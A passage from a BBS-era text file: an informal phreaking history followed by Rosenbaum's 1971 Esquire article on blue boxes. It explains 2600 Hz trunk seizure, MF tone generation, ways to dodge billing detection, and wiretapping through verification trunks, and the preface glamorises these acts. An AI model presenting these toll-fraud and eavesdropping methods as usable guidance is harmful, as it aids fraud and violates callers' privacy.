vast network. Now there were more people phreaking than the ones at MIT. Most people have heard of Captain Crunch (No not the cereal), he also discovered how to take rides through the fone system, with the aid of a small whistle found in a cereal box (can we guess which one?). By blowing this whistle, he generated the magical 2600hz and into the mouthpiece it sailed, giving him complete control over the system. I have heard rumors that at one time he made about of the calls coming out of San Francisco. He got famous fast. He made the cover of people magazine and was interviewed several times (as you'll soon see). Well he finally got caught after a long adventurous career. After he was caught he was put in jail and was beaten up quite badly because he would not teach other inmates how to box calls. After getting out, he joined Apple computer and is still out there somewhere. Then there was Joe the Whistler, blind form the day he was born. He could whistle a perfect 2600hz tone. It was rumored phreaks used to call him to tune their boxes. Well that was up to about 1970, then from 1970 to 1979, phreaking was mainly done by college students, businessmen and anyone who knew enough about electronics and the fone company to make a 555 Ic to generate those magic tones. Businessmen and a few college students mainly just blue box to get free calls. The others were still there, exploring 800#'s and the new ESS systems. ESS posed a big problem for phreaks then and even a bigger one now. ESS was not widespread, but where it was, blue boxing was next to impossible except for the most experienced phreak. Today ESS is installed in almost all major cities and blue boxing is getting harder and harder. 1978 marked a change in phreaking, the Apple ][, now a computer that was affordable, could be programmed, and could save all that precious work on a cassette. Then just a short while later came the Apple Cat modem. With this modem, generating all blue box tones was easy as writing a program to count form one to ten (a little exaggerated). Pretty soon programs that could imitate an operator just as good as the real thing were hitting the community, TSPS and Cat's Meow, are the standard now and are the best. 1982-1986: LD services were starting to appear in mass numbers. People now had programs to hack LD services, telephone exchanges, and even passwords. By now many phreaks were getting extremely good and BBS's started to spring up everywhere, each having many documentations on phreaking for the novice. Then it happened, the movie War Games was released and mass numbers of sixth grade to all ages flocked to see it. The problem wasn't that the movie was bad, it was that now EVERYONE wanted to be a hacker/phreak. Novices came out in such mass numbers, that bulletin boards started to be busy 24 hours a day. To this day, they still have not recovered. Other problems started to occur, novices guessed easy passwords on large government computers and started to play around... Well it wasn't long before they were caught, I think that many people remember the 414-hackers. They were so stupid as to say "yes" when the computer asked them whether they'd like to play games. Well at least it takes the heat off the real phreaks/hacker/crackers. 150. "Secrets of the Little Blue Box" by Ron Rosenbaum Dudes... These four files contain the story, "Secrets of the Little Blue Box". -A story so incredible it may even make you feel sorry for the phone company- Printed in the October 1971 issue of Esquire Magazine. If you happen to be in a library and come across a collection of Esquire magazines, the October 1971 issue is the first issue printed in the smaller format. The story begins on page 116 with a picture of a blue box. --One Farad Cap, Atlantic Anarchist Guild The Blue Box Is Introduced: Its Qualities Are Remarked I am in the expensively furnished living room of Al Gilbertson (His real name has been changed.), the creator of the "blue box." Gilbertson is holding one of his shiny black-and-silver "blue boxes" comfortably in the palm of his hand, pointing out the thirteen little red push buttons sticking up from the console. He is dancing his fingers over the buttons, tapping out discordant beeping electronic jingles. He is trying to explain to me how his little blue box does nothing less than place the entire telephone system of the world, satellites, cables and all, at the service of the blue-box operator, free of charge. "That's what it does. Essentially it gives you the power of a super operator. You seize a tandem with this top button," he presses the top button with his index finger and the blue box emits a high-pitched cheep, "and like that" -- cheep goes the blue box again -- "you control the phone company's long-distance switching systems from your cute little Princes phone or any old pay phone. And you've got anonymity. An operator has to operate from a definite location: the phone company knows where she is and what she's doing. But with your beeper box, once you hop onto a trunk, say from a Holiday Inn 800 (toll-free) number, they don't know where you are, or where you're coming from, they don't know how you slipped into their lines and popped up in that 800 number. They don't even know anything illegal is going on. And you can obscure your origins through as many levels as you like. You can call next door by way of White Plains, then over to Liverpool by cable, and then back here by satellite. You can call yourself from one pay phone all the way around the world to a pay phone next to you. And you get your dime back too." "And they can't trace the calls? They can't charge you?" "Not if you do it the right way. But you'll find that the free-call thing isn't really as exciting at first as the feeling of power you get from having one of these babies in your hand. I've watched people when they first get hold of one of these things and start using it, and discover they can make connections, set up crisscross and zigzag switching patterns back and forth across the world. They hardly talk to the people they finally reach. They say hello and start thinking of what kind of call to make next. They go a little crazy." He looks down at the neat little package in his palm. His fingers are still dancing, tapping out beeper patterns. "I think it's something to do with how small my models are. There are lots of blue boxes around, but mine are the smallest and most sophisticated electronically. I wish I could show you the prototype we made for our big syndicate order." He sighs. "We had this order for a thousand beeper boxes from a syndicate front man in Las Vegas. They use them to place bets coast to coast, keep lines open for hours, all of which can get expensive if you have to pay. The deal was a thousand blue boxes for $300 apiece. Before then we retailed them for $1500 apiece, but $300,000 in one lump was hard to turn down. We had a manufacturing deal worked out in the Philippines. Everything ready to go. Anyway, the model I had ready for limited mass production was small enough to fit inside a flip-top Marlboro box. It had flush touch panels for a keyboard, rather than these unsightly buttons, sticking out. Looked just like a tiny portable radio. In fact, I had designed it with a tiny transistor receiver to get one AM channel, so in case the law became suspicious the owner could switch on the radio part, start snapping his fingers, and no one could tell anything illegal was going on. I thought of everything for this model -- I had it lined with a band of thermite which could be ignited by radio signal from a tiny button transmitter on your belt, so it could be burned to ashes instantly in case of a bust. It was beautiful. A beautiful little machine. You should’ve seen the faces on these syndicate guys when they came back after trying it out. They'd hold it in their palm like they never wanted to let it go, and they'd say, 'I can't believe it. I can't believe it.' You probably won't believe it until you try it." The Blue Box Is Tested: Certain Connections Are Made About eleven o'clock two nights later Fraser Lucey has a blue box in the palm of his left hand and a phone in the palm of his right. He is standing inside a phone booth next to an isolated shut-down motel off Highway 1. I am standing outside the phone booth. Fraser likes to show off his blue box for people. Until a few weeks ago when Pacific Telephone made a few arrests in his city, Fraser Lucey liked to bring his blue box (This particular blue box, like most blue boxes, is not blue. Blue boxes have come to be called "blue boxes" either because 1) The first blue box ever confiscated by phone-company security men happened to be blue, or 2) To distinguish them from "black boxes." Black boxes are devices, usually a resistor in series, which, when attached to home phones, allow all incoming calls to be made without charge to one's caller.) to parties. It never failed: A few cheeps from his device and Fraser became the center of attention at the very hippest of gatherings, playing phone tricks and doing request numbers for hours. He began to take orders for his manufacturer in Mexico. He became a dealer. Fraser is cautious now about where he shows off his blue box. But he never gets tired of playing with it. "It's like the first time every time," he tells me. Fraser puts a dime in the slot. He listens for a tone and holds the receiver up to my ear. I hear the tone. Fraser begins describing, with a certain practiced air, what he does while he does it. "I'm dialing an 800 number now. Any 800 number will do. It's toll free. Tonight I think I'll use the ----- (he names a well-know rent-a-car company) 800 number. Listen, It's ringing. Here, you hear it? Now watch." He places the blue box over the mouthpiece of the phone so that the one silver and twelve black push buttons are facing up toward me. He presses the silver button -- the one at the top -- and I hear that high-pitched beep. "That's 2600 cycles per second to be exact," says Lucey. "Now, quick. Listen." He shoves the earpiece at me. The ringing has vanished. The line gives a slight hiccough, there is a sharp buzz, and then nothing but soft white noise. "We're home free now," Lucey tells me, taking back the phone and applying the blue box to its mouthpiece once again. "We're up on a tandem, into a long-lines trunk. Once you're up on a tandem, you can send yourself anywhere you want to go." He decides to check out London first. He chooses a certain pay phone located in Waterloo Station. This particular pay phone is popular with the phone-phreaks network because there are usually people walking by at all hours who will pick it up and talk for a while. He presses the lower left-hand corner button which is marked "KP" on the face of the box. "That's Key Pulse. It tells the tandem we're ready to give it instructions. First I'll punch out KP 182 START, which will slide us into the overseas sender in White Plains." I hear a neat clunk-cheep. "I think we'll head over to England by satellite. Cable is actually faster and the connection is somewhat better, but I like going by satellite. So I just punch out KP Zero 44. The Zero is supposed to guarantee a satellite connection and 44 is the country code for England. Okay... we're there. In Liverpool actually. Now all I have to do is punch out the London area code which is 1, and dial up the pay phone. Here, listen, I've got a ring now." I hear the soft quick purr-purr of a London ring. Then someone picks up the phone. "Hello," says the London voice. "Hello. Who's this?" Fraser asks. "Hello. There's actually nobody here. I just picked this up while I was passing by. This is a public phone. There's no one here to answer actually." "Hello. Don't hang up. I'm calling from the United States." "Oh. What is the purpose of the call? This is a public phone you know." "Oh. You know. To check out, uh, to find out what's going on in London. How is it there?" "Its five o'clock in the morning. It's raining now." "Oh. Who are you?" The London passerby turns out to be an R.A.F. enlistee on his way back to the base in Lincolnshire, with a terrible hangover after a thirty-six-hour pass. He and Fraser talk about the rain. They agree that it's nicer when it's not raining. They say good-bye and Fraser hangs up. His dime returns with a nice clink. "Isn't that far out," he says grinning at me. "London, like that." Fraser squeezes the little blue box affectionately in his palm. "I told ya this thing is for real. Listen, if you don't mind I'm gonna try this girl I know in Paris. I usually give her a call around this time. It freaks her out. This time I'll use the ------ (a different rent-a-car company) 800 number and we'll go by overseas cable, 133; 33 is the country code for France, the 1 sends you by cable. Okay, here we go.... Oh damn. Busy. Who could she be talking to at this time?" A state police car cruises slowly by the motel. The car does not stop, but Fraser gets nervous. We hop back into his car and drive ten miles in the opposite direction until we reach a Texaco station locked up for the night. We pull up to a phone booth by the tire pump. Fraser dashes inside and tries the Paris number. It is busy again. "I don't understand who she could be talking to. The circuits may be busy. It's too bad I haven't learned how to tap into lines overseas with this thing yet." Fraser begins to phreak around, as the phone phreaks say. He dials a leading nationwide charge card's 800 number and punches out the tones that bring him the time recording in Sydney, Australia. He beeps up the weather recording in Rome, in Italian of course. He calls a friend in Boston and talks about a certain over-the-counter stock they are into heavily. He finds the Paris number busy again. He calls up "Dial a Disc" in London, and we listen to Double Barrel by David and Ansil Collins, the number-one hit of the week in London. He calls up a dealer of another sort and talks in code. He calls up Joe Engressia, the original blind phone-phreak genius, and pays his respects. There are other calls. Finally Fraser gets through to his young lady in Paris. They both agree the circuits must have been busy, and criticize the Paris telephone system. At two-thirty in the morning Fraser hangs up, pockets his dime, and drives off, steering with one hand, holding what he calls his "lovely little blue box" in the other. You Can Call Long Distance For Less Than You Think "You see, a few years ago the phone company made one big mistake," Gilbertson explains two days later in his apartment. "They were careless enough to let some technical journal publish the actual frequencies used to create all their multi-frequency tones. Just a theoretical article some Bell Telephone Laboratories engineer was doing about switching theory, and he listed the tones in passing. At ----- (a well-known technical school) I had been fooling around with phones for several years before I came across a copy of the journal in the engineering library. I ran back to the lab and it took maybe twelve hours from the time I saw that article to put together the first working blue box. It was bigger and clumsier than this little baby, but it worked." It's all there on public record in that technical journal written mainly by Bell Lab people for other telephone engineers. Or at least it was public. "Just try and get a copy of that issue at some engineering-school library now. Bell has had them all red-tagged and withdrawn from circulation," Gilbertson tells me. "But it's too late. It's all public now. And once they became public the technology needed to create your own beeper device is within the range of any twelve-year-old kid, any twelve-year-old blind kid as a matter of fact. And he can do it in less than the twelve hours it took us. Blind kids do it all the time. They can't build anything as precise and compact as my beeper box, but theirs can do anything mine can do." "How?" "Okay. About twenty years ago AT&T. made a multi-billion-dollar decision to operate its entire long-distance switching system on twelve electronically generated combinations of twelve master tones. Those are the tones you sometimes hear in the background after you've dialed a long-distance number. They decided to use some very simple tones -- the tone for each number is just two fixed single-frequency tones played simultaneously to create a certain beat frequency. Like 1300 cycles per second and 900 cycles per second played together give you the tone for digit 5. Now, what some of these phone phreaks have done is get themselves access to an electric organ. Any cheap family home-entertainment organ. Since the frequencies are public knowledge now -- one blind phone phreak has even had them recorded in one of the talking books for the blind -- they just have to find the musical notes on the organ which correspond to the phone tones. Then they tape them. For instance, to get Ma Bell's tone for the number 1, you press down organ keys F~5 and A~5 (900 and 700 cycles per second) at the same time. To produce the tone for 2 it's F~5 and C~6 (1100 and 700 cps). The phone phreaks circulate the whole list of notes so there's no trial and error anymore." He shows me a list of the rest of the phone numbers and the two electric organ keys that produce them. "Actually, you have to record these notes at 3 3/4 inches-per-second tape speed and double it to 7 « inches-per-second when you play them back, to get the proper tones," he adds. "So once you have all the tones recorded, how do you plug them into the phone system?" "Well, they take their organ and their cassette recorder, and start banging out entire phone numbers in tones on the organ, including country codes, routing instructions, 'KP' and 'Start' tones. Or, if they don't have an organ, someone in the phone-phreak network sends them a cassette with all the tones recorded, with a voice saying 'Number one,' then you have the tone, 'Number two,' then the tone and so on. So with two cassette recorders they can put together a series of phone numbers by switching back and forth from number to number. Any idiot in the country with a cheap cassette recorder can make all the free calls he wants." "You mean you just hold the cassette recorder up the mouthpiece and switch in a series of beeps you've recorded? The phone thinks that anything that makes these tones must be its own equipment?" "Right. As long as you get the frequency within thirty cycles per second of the phone company's tones, the phone equipment thinks it hears its own voice talking to it. The original granddaddy phone phreak was this blind kid with perfect pitch, Joe Engressia, who used to whistle into the phone. An operator could tell the difference between his whistle and the phone company's electronic tone generator, but the phone company's switching circuit can't tell them apart. The bigger the phone company gets and the further away from human operators it gets, the more vulnerable it becomes to all sorts of phone phreaking." A Guide for the Perplexed "But wait a minute," I stop Gilbertson. "If everything you do sounds like phone-company equipment, why doesn't the phone company charge you for the call the way it charges its own equipment?" "Okay. That's where the 2600-cycle tone comes in. I better start from the beginning." The beginning he describes for me is a vision of the phone system of the continent as thousands of webs, of long-line trunks radiating from each of the hundreds of toll switching offices to the other toll switching offices. Each toll switching office is a hive compacted of thousands of long-distance tandems constantly whistling and beeping to tandems in far-off toll switching offices. The tandem is the key to the whole system. Each tandem is a line with some relays with the capability of signaling any other tandem in any other toll switching office on the continent, either directly one-to-one or by programming a roundabout route through several other tandems if all the direct routes are busy. For instance, if you want to call from New York to Los Angeles and traffic is heavy on all direct trunks between the two cities, your tandem in New York is programmed to try the next best route, which may send you down to a tandem in New Orleans, then up to San Francisco, or down to a New Orleans tandem, back to an Atlanta tandem, over to an Albuquerque tandem and finally up to Los Angeles. When a tandem is not being used, when it's sitting there waiting for someone to make a long-distance call, it whistles. One side of the tandem, the side "facing" your home phone, whistles at 2600 cycles per second toward all the home phones serviced by the exchange, telling them it is at their service, should they be interested in making a long-distance call. The other side of the tandem is whistling 2600 cps. into one or more long-distance trunk lines, telling the rest of the phone system that it is neither sending nor receiving a call through that trunk at the moment, that it has no use for that trunk at the moment. "When you dial a long-distance number the first thing that happens is that you are hooked into a tandem. A register comes up to the side of the tandem facing away from you and presents that side with the number you dialed. This sending side of the tandem stops whistling 2600 into its trunk line. When a tandem stops the 2600 tone it has been sending through a trunk, the trunk is said to be "seized," and is now ready to carry the number you have dialed -- converted into multi-frequency beep tones -- to a tandem in the area code and central office you want. Now when a blue-box operator wants to make a call from New Orleans to New York he starts by dialing the 800 number of a company which might happen to have its headquarters in Los Angeles. The sending side of the New Orleans tandem stops sending 2600 out over the trunk to the central office in Los Angeles, thereby seizing the trunk. Your New Orleans tandem begins sending beep tones to a tandem it has discovered idly whistling 2600 cycles in Los Angeles. The receiving end of that LA tandem is seized, stops whistling 2600, listens to the beep tones which tell it which LA phone to ring, and starts ringing the 800 number. Meanwhile a mark made in the New Orleans office accounting tape notes that a call from your New Orleans phone to the 800 number in LA has been initiated and gives the call a code number. Everything is routine so far. But then the phone phreak presses his blue box to the mouthpiece and pushes the 2600-cycle button, sending 2600 out from the New Orleans tandem to the LA tandem. The LA tandem notices 2600 cycles are coming over the line again and assumes that New Orleans has hung up because the trunk is whistling as if idle. The LA tandem immediately ceases ringing the LA 800 number. But as soon as the phreak takes his finger off the 2600 button, the LA tandem assumes the trunk is once again being used because the 2600 is gone, so it listens for a new series of digit tones - to find out where it must send the call. Thus the blue-box operator in New Orleans now is in touch with a tandem in LA which is waiting like an obedient genie to be told what to do next. The blue-box owner then beeps out the ten digits of the New York number which tell the LA tandem to relay a call to New York City. Which it promptly does. As soon as your party picks up the phone in New York, the side of the New Orleans tandem facing you stops sending 2600 cycles to you and starts carrying his voice to you by way of the LA tandem. A notation is made on the accounting tape that the connection has been made on the 800 call which had been initiated and noted earlier. When you stop talking to New York a notation is made that the 800 call has ended. At three the next morning, when the phone company's accounting computer starts reading back over the master accounting tape for the past day, it records that a call of a certain length of time was made from your New Orleans home to an LA 800 number and, of course, the accounting computer has been trained to ignore those toll-free 800 calls when compiling your monthly bill. "All they can prove is that you made an 800 toll-free call," Gilbertson the inventor concludes. "Of course, if you're foolish enough to talk for two hours on an 800 call, and they've installed one of their special anti-fraud computer programs to watch out for such things, they may spot you and ask why you took two hours talking to Army Recruiting's 800 number when you're 4-F. But if you do it from a pay phone, they may discover something peculiar the next day -- if they've got a blue-box hunting program in their computer -- but you'll be a long time gone from the pay phone by then. Using a pay phone is almost guaranteed safe." "What about the recent series of blue-box arrests all across the country -- New York, Cleveland, and so on?" I asked. "How were they caught so easily?" "From what I can tell, they made one big mistake: they were seizing trunks using an area code plus 555-1212 instead of an 800 number. Using 555 is easy to detect because when you send multi-frequency beep tones of 555 you get a charge for it on your tape and the accounting computer knows there's something wrong when it tries to bill you for a two-hour call to Akron, Ohio, information, and it drops a trouble card which goes right into the hands of the security agent if they're looking for blue-box user. "Whoever sold those guys their blue boxes didn't tell them how to use them properly, which is fairly irresponsible. And they were fairly stupid to use them at home all the time. "But what those arrests really mean is than an awful lot of blue boxes are flooding into the country and that people are finding them so easy to make that they know how to make them before they know how to use them. Ma Bell is in trouble." And if a blue-box operator or a cassette-recorder phone phreak sticks to pay phones and 800 numbers, the phone company can't stop them? "Not unless they change their entire nationwide long-lines technology, which will take them a few billion dollars and twenty years. Right now they can't do a thing. They're screwed." Captain Crunch Demonstrates His Famous Unit There is an underground telephone network in this country. Gilbertson discovered it the very day news of his activities hit the papers. That evening his phone began ringing. Phone phreaks from Seattle, from Florida, from New York, from San Jose, and from Los Angeles began calling him and telling him about the phone-phreak network. He'd get a call from a phone phreak who'd say nothing but, "Hang up and call this number." When he dialed the number he'd find himself tied into a conference of a dozen phone phreaks arranged through a quirky switching station in British Columbia. They identified themselves as phone phreaks, they demonstrated their homemade blue boxes which they called "M-Fers" (for "multi-frequency," among other things) for him, they talked shop about phone-phreak devices. They let him in on their secrets on the theory that if the phone company was after him he must be trustworthy. And, Gilbertson recalls, they stunned him with their technical sophistication. I ask him how to get in touch with the phone-phreak network. He digs around through a file of old schematics and comes up with about a dozen numbers in three widely separated area codes. "Those are the centers," he tells me. Alongside some of the numbers he writes in first names or nicknames: names like Captain Crunch, Dr. No, Frank Carson (also a code word for a free call), Marty Freeman (code word for M-F device), Peter Perpendicular Pimple, Alefnull, and The Cheshire Cat. He makes checks alongside the names of those among these top twelve who are blind. There are five checks. I ask him who this Captain Crunch person is. "Oh. The Captain. He's probably the most legendary phone phreak. He calls himself Captain Crunch after the notorious Cap'n Crunch 2600 whistle." (Several years ago, Gilbertson explains, the makers of Cap'n Crunch breakfast cereal offered a toy-whistle prize in every box as a treat for the Cap'n Crunch set. Somehow a phone phreak discovered that the toy whistle just happened to produce a perfect 2600-cycle tone. When the man who calls himself Captain Crunch was transferred overseas to England with his Air Force unit, he would receive scores of calls from his friends and "mute" them -- make them free of charge to them -- by blowing his Cap'n Crunch whistle into his end.) "Captain Crunch is one of the older phone phreaks," Gilbertson tells me. "He's an engineer who once got in a little trouble for fooling around with the phone, but he can't stop. Well, the guy drives across country in a Volkswagen van with an entire switchboard and a computerized super-sophisticated M-F-er in the back. He'll pull up to a phone booth on a lonely highway somewhere, snake a cable out of his bus, hook it onto the phone and sit for hours, days sometimes, sending calls zipping back and forth across the country, all over the world...." Back at my motel, I dialed the number he gave me for "Captain Crunch" and asked for G---- T-----, his real name, or at least the name he uses when he's not dashing into a phone booth beeping out M-F tones faster than a speeding bullet and zipping phantomlike through the phone company's long-distance lines. When G---- T----- answered the phone and I told him I was preparing a story for Esquire about phone phreaks, he became very indignant. "I don't do that. I don't do that anymore at all. And if I do it, I do it for one reason and one reason only. I'm learning about a system. The phone company is a System. A computer is a System, do you understand? If I do what I do, it is only to explore a system. Computers, systems, that's my bag. The phone company is nothing but a computer." A tone of tightly restrained excitement enters the Captain's voice when he starts talking about systems. He begins to pronounce each syllable with the hushed deliberation of an obscene caller. "Ma Bell is a system I want to explore. It's a beautiful system, you know, but Ma Bell screwed up. It's terrible because Ma Bell is such a beautiful system, but she screwed up. I learned how she screwed up from a couple of blind kids who wanted me to build a device. A certain device. They said it could make free calls. I wasn't interested in free calls. But when these blind kids told me I could make calls into a computer, my eyes lit up. I wanted to learn about computers. I wanted to learn about Ma Bell's computers. So I build the little device, but I built it wrong and Ma Bell found out. Ma Bell can detect things like that. Ma Bell knows. So I'm strictly rid of it now. I don't do it. Except for learning purposes." He pauses. "So you want to write an article. Are you paying for this call? Hang up and call this number." He gives me a number in a area code a thousand miles away of his own. I dial the number. "Hello again. This is Captain Crunch. You are speaking to me on a toll-free loop-around in Portland, Oregon. Do you know what a toll-free loop around is? I'll tell you." He explains to me that almost every exchange in the country has open test numbers which allow other exchanges to test their connections with it. Most of these numbers occur in consecutive pairs, such as 302 956-0041 and 302 956-0042. Well, certain phone phreaks discovered that if two people from anywhere in the country dial the two consecutive numbers they can talk together just as if one had called the other's number, with no charge to either of them, of course. "Now our voice is looping around in a 4A switching machine up there in Canada, zipping back down to me," the Captain tells me. "My voice is looping around up there and back down to you. And it can't ever cost anyone money. The phone phreaks and I have compiled a list of many of these numbers. You would be surprised if you saw the list. I could show it to you. But I won't. I'm out of that now. I'm not out to screw Ma Bell. I know better. If I do anything it's for the pure knowledge of the System. You can learn to do fantastic things. Have you ever heard eight tandems stacked up? Do you know the sound of tandems stacking and unstacking? Give me your phone number. Okay. Hang up now and wait a minute." Slightly less than a minute later the phone rang and the Captain was on the line, his voice sounding far more excited, almost aroused. "I wanted to show you what it's like to stack up tandems. To stack up tandems." (Whenever the Captain says "stack up" it sounds as if he is licking his lips.) "How do you like the connection you're on now?" the Captain asks me. "It's a raw tandem. A raw tandem. Ain't nothing' up to it but a tandem. Now I'm going to show you what it's like to stack up. Blow off. Land in a far away place. To stack that tandem up, whip back and forth across the country a few times, then shoot on up to Moscow. "Listen," Captain Crunch continues. "Listen. I've got line tie on my switchboard here, and I'm gonna let you hear me stack and unstack tandems. Listen to this. It's gonna blow your mind." First I hear a super rapid-fire pulsing of the flutelike phone tones, then a pause, then another popping burst of tones, then another, then another. Each burst is followed by a beep-kachink sound. "We have now stacked up four tandems," said Captain Crunch, sounding somewhat remote. "That's four tandems stacked up. Do you know what that means? That means I'm whipping back and forth, back and forth twice, across the country, before coming to you. I've been known to stack up twenty tandems at a time. Now, just like I said, I'm going to shoot up to Moscow." There is a new, longer series of beeper pulses over the line, a brief silence, then a ring. "Hello," answers a far-off voice. "Hello. Is this the American Embassy Moscow?" "Yes, sir. Who is this calling?" says the voice. "Yes. This is test board here in New York. We're calling to check out the circuits, see what kind of lines you've got. Everything okay there in Moscow?" "Okay?" "Well, yes, how are things there?" "Oh. Well, everything okay, I guess." "Okay. Thank you." They hang up, leaving a confused series of beep-kachink sounds hanging in mid-ether in the wake of the call before dissolving away. The Captain is pleased. "You believe me now, don't you? Do you know what I'd like to do? I'd just like to call up your editor at Esquire and show him just what it sounds like to stack and unstack tandems. I'll give him a show that will blow his mind. What's his number? I ask the Captain what kind of device he was using to accomplish all his feats. The Captain is pleased at the question. "You could tell it was special, couldn't you?" Ten pulses per second. That's faster than the phone company's equipment. Believe me, this unit is the most famous unit in the country. There is no other unit like it. Believe me." "Yes, I've heard about it. Some other phone phreaks have told me about it." "They have been referring to my, ahem, unit? What is it they said? Just out of curiosity, did they tell you it was a highly sophisticated computer-operated unit, with acoustical coupling for receiving outputs and a switch-board with multiple-line-tie capability? Did they tell you that the frequency tolerance is guaranteed to be not more than .05 percent? The amplitude tolerance less than .01 decibel? Those pulses you heard were perfect. They just come faster than the phone company. Those were high-precision op-amps. Op-amps are instrumentation amplifiers designed for ultra-stable amplification, super-low distortion and accurate frequency response. Did they tell you it can operate in temperatures from -55øC to +125øC?" I admit that they did not tell me all that. "I built it myself," the Captain goes on. "If you were to go out and buy the components from an industrial wholesaler it would cost you at least $1500. I once worked for a semiconductor company and all this didn't cost me a cent. Do you know what I mean? Did they tell you about how I put a call completely around the world? I'll tell you how I did it. I M-Fed Tokyo inward, who connected me to India, India connected me to Greece, Greece connected me to Pretoria, South Africa, South Africa connected me to South America, I went from South America to London, I had a London operator connect me to a New York operator, I had New York connect me to a California operator who rang the phone next to me. Needless to say I had to shout to hear myself. But the echo was far out. Fantastic. Delayed. It was delayed twenty seconds, but I could hear myself talk to myself." "You mean you were speaking into the mouthpiece of one phone sending your voice around the world into your ear through a phone on the other side of your head?" I asked the Captain. I had a vision of something vaguely autoerotic going on, in a complex electronic way. "That's right," said the Captain. "I've also sent my voice around the world one way, going east on one phone, and going west on the other, going through cable one way, satellite the other, coming back together at the same time, ringing the two phones simultaneously and picking them up and whipping my voice both ways around the world back to me. Wow. That was a mind blower." "You mean you sit there with both phones on your ear and talk to yourself around the world," I said incredulously. "Yeah. Um hum. That's what I do. I connect the phone together and sit there and talk." "What do you say? What do you say to yourself when you're connected?" "Oh, you know. Hello test one two three," he says in a low-pitched voice. "Hello test one two three," he replied to himself in a high-pitched voice. "Hello test one two three," he repeats again, low-pitched. "Hello test one two three," he replies, high-pitched. "I sometimes do this: Hello Hello Hello Hello, Hello, hello," he trails off and breaks into laughter. Why Captain Crunch Hardly Ever Taps Phones Anymore Using internal phone-company codes, phone phreaks have learned a simple method for tapping phones. Phone-company operators have in front of them a board that holds verification jacks. It allows them to plug into conversations in case of emergency, to listen in to a line to determine if the line is busy or the circuits are busy. Phone phreaks have learned to beep out the codes which lead them to a verification operator, tell the verification operator they are switchmen from some other area code testing out verification trunks. Once the operator hooks them into the verification trunk, they disappear into the board for all practical purposes, slip unnoticed into any one of the 10,000 to 100,000 numbers in that central office without the verification operator knowing what they're doing, and of course without the two parties to the connection knowing there is a phantom listener present on their line. Toward the end of my hour-long first conversation with him, I asked the Captain if he ever tapped phones. "Oh no. I don't do that. I don't think it's right," he told me firmly. "I have the power to do it but I don't... Well one time, just one time, I have to admit that I did. There was this girl, Linda, and I wanted to find out... you know. I tried to call her up for a date. I had a date with her the last weekend and I thought she liked me. I called her up, man, and her line was busy, and I kept calling and it was still busy. Well, I had just learned about this system of jumping into lines and I said to myself, 'Hmmm. Why not just see if it works. It'll surprise her if all of a sudden I should pop up on her line. It'll impress her, if anything.' So I went ahead and did it. I M-Fed into the line. My M-F-er is powerful enough when patched directly into the mouthpiece to trigger a verification trunk without using an operator the way the other phone phreaks have to. "I slipped into the line and there she was talking to another boyfriend. Making sweet talk to him. I didn't make a sound because I was so disgusted. So I waited there for her to hang up, listening to her making sweet talk to the other guy. You know. So as soon as she hung up I instantly M-F-ed her up and all I said was, 'Linda, we're through.' And I hung up. And it blew her head off. She couldn't figure out what the hell happened. "But that was the only time. I did it thinking I would surprise her, impress her. Those were all my intentions were, and well, it really kind of hurt me pretty badly, and... and ever since then I don't go into verification trunks." Moments later my first conversation with the Captain comes to a close. "Listen," he says, his spirits somewhat cheered, "listen. What you are going to hear when I hang up is the sound of tandems unstacking. Layer after layer of tandems unstacking until there's nothing left of the stack, until it melts away into nothing. Cheep, cheep, cheep, cheep," he concludes, his voice descending to a whisper with each cheep. He hangs up. The phone suddenly goes into four spasms: kachink cheep. Kachink cheep kachink cheep kachink cheep, and the complex connection has wiped itself out like the Cheshire cat's smile. The MF Boogie Blues The next number I choose from the select list of phone-phreak alumni, prepared for me by the blue-box inventor, is a Memphis number. It is the number of Joe Engressia, the first and still perhaps the most accomplished blind phone phreak. Three years ago Engressia was a nine-day wonder in newspapers and magazines all over America because he had been discovered whistling free long-distance connections for fellow students at the University of South Florida. Engressia was born with perfect pitch: he could whistle phone tones better than the phone-company's equipment. Engressia might have gone on whistling in the dark for a few friends for the rest of his life if the phone company hadn't decided to expose him. He was warned, disciplined by the college, and the whole case became public. In the months following media reports of his talent, Engressia began receiving strange calls. There were calls from a group of kids in Los Angeles who could do some very strange things with the quirky General Telephone and Electronics circuitry in LA suburbs. There were calls from a group of mostly blind kids in ----, California, who had been doing some interesting experiments with Cap'n Crunch whistles and test loops. There was a group in Seattle, a group in Cambridge, Massachusetts, a few from New York, a few scattered across the country. Some of them had already equipped themselves with cassette and electronic M-F devices. For some of these groups, it was the first time they knew of the others. The exposure of Engressia was the catalyst that linked the separate phone-phreak centers together. They all called Engressia. They talked to him about what he was doing and what they were doing. And then he told them -- the scattered regional centers and lonely independent phone phreakers -- about each other, gave them each other's numbers to call, and within a year the scattered phone-phreak centers had grown into a nationwide underground. Joe Engressia is only twenty-two years old now, but along the phone-phreak network he is "the old man," accorded by phone phreaks something of the reverence the phone company bestows on Alexander Graham Bell. He seldom needs to make calls anymore. The phone phreaks all call him and let him know what new tricks, new codes, new techniques they have learned. Every night he sits like a sightless spider in his little apartment receiving messages from every tendril of his web. It is almost a point of pride with Joe that they call him. But when I reached him in his Memphis apartment that night, Joe Engressia was lonely, jumpy and upset. "God, I'm glad somebody called. I don't know why tonight of all nights I don't get any calls. This guy around here got drunk again tonight and propositioned me again. I keep telling him we'll never see eye to eye on this subject, if you know what I mean. I try to make light of it, you know, but he doesn't get it. I can head him out there getting drunker and I don't know what he'll do next. It's just that I'm really all alone here, just moved to Memphis, it's the first time I'm living on my own, and I'd hate for it to all collapse now. But I won't go to bed with him. I'm just not very interested in sex and even if I can't see him I know he's ugly. "Did you hear that? That's him banging a bottle against the wall outside. He's nice. Well forget about it. You're doing a story on phone phreaks? Listen to this. It's the MF Boogie Blues. Sure enough, a jumpy version of Muskrat Ramble boogies its way over the line, each note one of those long-distance phone tones. The music stops. A huge roaring voice blasts the phone off my ear: "AND THE QUESTION IS..." roars the voice, "CAN A BLIND PERSON HOOK UP AN AMPLIFIER ON HIS OWN?" The roar ceases. A high-pitched operator-type voice replaces it. "This is Southern Braille Tel. & Tel. Have tone, will phone." This is succeeded by a quick series of M-F tones, a swift "kachink" and a deep reassuring voice: "If you need home care, call the visiting-nurses association. First National time in Honolulu is 4:32 p.m." Joe back in his Joe voice again: "Are we seeing eye to eye? 'Si, si,' said the blind Mexican. Ahem. Yes. Would you like to know the weather in Tokyo?" This swift manic sequence of phone-phreak vaudeville stunts and blind-boy jokes manages to keep Joe's mind off his tormentor only as long as it lasts. "The reason I'm in Memphis, the reason I have to depend on that homosexual guy, is that this is the first time I've been able to live on my own and make phone trips on my own. I've been banned from all central offices around home in Florida, they knew me too well, and at the University some of my fellow scholars were always harassing me because I was on the dorm pay phone all the time and 